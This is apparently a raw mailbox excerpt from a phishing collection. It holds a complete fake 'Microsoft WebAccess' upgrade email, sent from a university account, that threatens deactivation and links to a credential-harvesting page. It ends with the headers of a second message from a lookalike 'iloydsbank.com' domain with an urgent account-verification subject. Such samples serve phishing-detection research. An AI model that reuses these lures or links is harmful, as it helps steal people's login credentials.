From: "Aaron R. Connor - connorar" <connorar@clarkson.edu>
Subject: RE: Microsoft WebAccess Update
Thread-Topic: Microsoft WebAccess Update
Thread-Index: AdDFWaBkHbcRqcgBQ7qU1mo+TyBPNgACTJ9y
Date: Thu, 23 Jul 2015 16:17:41 +0000
Message-ID: <2E055823293F8B40AE52C1D110A6A89D60938343@EXCH09-DB.ad.clarkson.edu>
References: <2E055823293F8B40AE52C1D110A6A89D6093503B@EXCH09-DB.ad.clarkson.edu>
In-Reply-To: <2E055823293F8B40AE52C1D110A6A89D6093503B@EXCH09-DB.ad.clarkson.edu>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [41.190.2.142]
Content-Type: multipart/alternative;
	boundary="_000_2E055823293F8B40AE52C1D110A6A89D60938343EXCH09DBadclark_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 130

--_000_2E055823293F8B40AE52C1D110A6A89D60938343EXCH09DBadclark_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dear User,

Microsoft WebAccess desk will undergo unscheduled system maintenance today =
in order to improve your account for the next quota of the year. The new Mi=
crosoft WebAccess 2015 will be installed on your web-mail account.

Your present account will be upgraded to create space for the new web-acces=
s 2015. In other to complete this process, please CLICKHERE<http://altoedu.=
com/x3/cache/blueOwa/> and complete the survey.

Your account will be inactive for the remaining quota of the year if this s=
urvey is not completed.

Thank you.
Web-mail Administrator

--_000_2E055823293F8B40AE52C1D110A6A89D60938343EXCH09DBadclark_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style type=3D"text/css" id=3D"owaParaStyle">P {margin-top:0;margin-bottom:=
0;}</style>
</head>
<body ocsi=3D"0" fpstyle=3D"1">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;">Dear User,
<div style=3D"font-family: Times New Roman; color: #000000; font-size: 16px=
">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div><br>
</div>
<div>Microsoft WebAccess desk will undergo unscheduled system maintenance t=
oday in order to improve your account for the next quota of the year. The n=
ew Microsoft WebAccess 2015 will be installed on your web-mail account.</di=
v>
<div>&nbsp;</div>
<div>Your present account will be upgraded to create space for the new web-=
access 2015. In other to complete this process, please
<a href=3D"http://altoedu.com/x3/cache/blueOwa/" target=3D"_blank">CLICKHER=
E</a> and complete the survey.</div>
<div>&nbsp;</div>
<div>Your account will be inactive for the remaining quota of the year if t=
his survey is not completed.&nbsp;</div>
<div>&nbsp;</div>
<div>Thank you.</div>
<div>Web-mail Administrator</div>
</div>
</div>
</div>
</div>
</body>
</html>

--_000_2E055823293F8B40AE52C1D110A6A89D60938343EXCH09DBadclark_--

From internetbanking@iloydsbank.com  Sat Jul 25 05:29:48 2015
Return-Path: <internetbanking@iloydsbank.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id BB0C4F416C
	for <jose@login.monkey.org>; Sat, 25 Jul 2015 05:29:48 -0500 (CDT)
Received: from smtpin19.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 5E66718471C
	for <jose@login.monkey.org>; Sat, 25 Jul 2015 10:29:48 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70446409656.19.cord63_1b42047feec4f
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature";
	dkim-adsp=temperror reason="'_adsp._domainkey.Iloydsbank.com' reply was unresolved CNAME" (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 85,1,0,035c5470420e3022,d41d8cd98f00b204,internetbanking@iloydsbank.com,:internetbanking@iloydsbank.com,RULES_HIT:41:72:152:379:543:677:871:962:967:973:983:988:989:994:1189:1208:1216:1254:1260:1313:1314:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1545:1546:1547:1555:1571:1575:1588:1592:1594:1730:1744:1764:1777:1792:1801:1803:2194:2198:2199:2200:2525:2527:2568:2610:2639:2682:2685:2741:2859:2890:2893:2894:2897:2901:2908:2909:2916:2921:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3352:3865:3866:3867:3868:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4362:4605:4822:5007:6261:6354:6669:6687:6748:7281:7398:7652:8512:8518:8583:8603:8829:8957:9025:9080:9149:9416:9908:10004:10079:10216:10265:10305:10394:11026:11233:11604:11657:11658:11914:12043:12217:12438:12517:12519:12555:12561:12973:13019:13132:13144:13163:13229:13230:13231:13302:14096:14515:21062:21080,0,RBL:212.40.7.66-irl.urbl.hoste
X-HE-Tag: cord63_1b42047feec4f
X-Filterd-Recvd-Size: 65017
Received: from vds303104.vtx.ch (vds303104.vtx.ch [212.40.7.66])
	by imf01.b.hostedemail.com (Postfix) with ESMTP
	for <JOSE@MONKEY.ORG>; Sat, 25 Jul 2015 10:29:47 +0000 (UTC)
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
Received: from [104.167.118.61] (unknown [104.167.118.61])
	by vds303104.vtx.ch (Postfix) with ESMTPA id 0DDB580C3F6;
	Fri, 24 Jul 2015 14:47:00 +0200 (CEST)
Content-Type: multipart/mixed; boundary="===============0053034220=="
MIME-Version: 1.0
Subject: FINAL NOTICE: Verification of Recent Account Activity(s) Required
To: Recipients <InternetBanking@Iloydsbank.com>
